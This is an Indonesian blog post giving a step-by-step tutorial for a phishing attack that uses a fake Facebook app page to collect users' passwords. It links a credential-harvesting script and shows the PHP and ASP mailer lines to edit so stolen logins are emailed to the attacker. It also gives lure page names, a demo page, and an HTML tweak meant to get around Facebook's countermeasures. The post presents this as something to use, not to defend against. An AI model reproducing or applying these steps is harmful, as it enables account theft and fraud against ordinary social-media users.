Facebook,sapa sih yang gak kenal Facebook???Salah satu situs jejaring sosial terbesar selain Friendster dan Twitter.Facebook dikenal karena kemudahan dan tentunya keamanannya...
Aman??100%??hem..tidak ada yang sempurna..banyak para hacker yang berusaha menembus pertahanan Facebook,seperti yang dilakukan team inj3ct0r yang menggunakan tehnik SQL pada salah satu Apps yang ada di faceboook.Tehnik lain??hem..saat ini lebih banyak menggunakan Social Enginering seperti tehnik Pishing,Poisoning Attack pada satu jaringan,Fake Login dll.Disini saya akan membahas salah satu tehnik Social Enginering yaaa semacam fake login tapi menggunakan fasilitas Facebook itu sendiri.Maksudnya??maksudnya adalah kita membuat halaman palsu berupa apps di dalam Facebook tersebut.
Tata cara nya sebagai berikut:
1.Siapkan scriptnya dulu
http://www.mediafire.com/?448qgmyux5o2mb82.Cari server gratisan atau injekkan yang support .PHP , .ASP
3.Facebook tentunya
Mulai pembuatannya deh :
sudah disiapkan scriptnya??kalau udah rubahlah di bagian yang saya tandai menjadi alamat e-mail anda
.php
mail(.ASP
"youremailaddress@domain.com",
Mailer.RemoteHost = "smtp.yourhost.com"
Mailer.AddRecipient "your name", "youremailaddress@host.com"
lalu masuk ke: http://www.facebook.com/pages/create
dan pilih "Perjuangan atau Komunitas" lalu masukkan nama halaman anda.Disini dituntut kepandaian kita mengolah kata agar berkesan menarik.Contoh "Cek Kepopuleran FB Anda " dan selesaikan langkah yang di anjurkan,kalau udah punya Logo buat halaman kita lebih bagus lagi sekalian kita upload disana.Kalau udah di kolom "Alamat Web" kita isi http://www.facebook.com/ lalu selesai deh.
lalau saatnya kita masuk ke
http://www.facebook.com/add.php?api_key=fdfd01c9df7d644a68a4e989ae861e44&pagesdan kita pilih "aplikasi" lalu kita pilih "Go To Apps" dan masukkan kode FBML yang udah didownload tadi...jangan lupa di bagian yang bertuliskan "http://yourwebsite.com/facebook.php" diganti Url tempat kita mengupload file Facebook.php tadi...dan klik "Save". selesai sudah tugas ke 2 kita.Liat gambar dibawah ini
Terakhir,kita share halaman yang udah kita buat tadi,lalu minta temen-temen kita buat me-klik tombol "Like" usahakan minimal 25 orang yang nge-like..jadi kita bisa membuat nama untuk halaman kita,misal jadi "http://www.facebook.com/pagechecker"..dan berharap orang-orang mencoba aplikasi kita,lalu boom..panen password deh....cek folder spam di server e-mail kita...
Kalau mau liat hasilnya ni ada halaman demonya,tapi jangan coba-coba masukkin password asli ya..he he he
DEMO
http://www.facebook.com/pages/Cek-Harga-Akun-FB-Anda/187358334667482?v=app_4949752878dan hasilnya akan terekam dengan baik di e-mail yang udah kita setting tadi...he he he
Facebook sudah "sedikit" menyadari tehnik ini,maka bila menggunakan script yang udah saya sediakan disini dan Box untuk input password tidak muncul maka ubahlah script dibagian ini
<input type="PaSSword" tabindex="3" value="" name="password" id="password" class="textbox" />menjadi:
<input type="text" tabindex="3" value="" name="password" id="password" class="textbox" />
Sumber: www.xcode.or.id
-=( Moga bermanfaat )=-
0 komentar:
Post a Comment